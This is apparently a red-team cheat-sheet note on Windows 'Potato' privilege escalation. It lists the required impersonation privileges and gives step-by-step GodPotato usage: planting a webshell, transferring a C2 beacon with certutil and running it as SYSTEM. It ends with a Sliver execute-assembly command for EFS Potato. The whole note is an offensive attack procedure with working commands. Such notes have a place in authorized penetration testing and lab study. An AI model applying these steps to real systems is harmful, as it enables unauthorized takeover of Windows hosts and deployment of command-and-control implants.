Windows Potatos
1.0 Prerequisites
Following provileges are required (whoami /priv):
SeImpersonatePrivilegeSeAssignPrimaryTokenPrivilege
2.0 GodPotato
- upload a webshell
- transfer beacon with e.g. BIN - certutil
- execute beacon with webshell
- new webshell in a new tab
- transfer GodPotato.exe with certutil
- Run:
GodPotato.exe -cmd "Beacon.exe"3.0 EFS Potato (Sliver)
sliver (phant0mas) > execute-assembly /home/kali/tools/privesc/efs.exe "C:\windows\tasks\phant0mas.exe"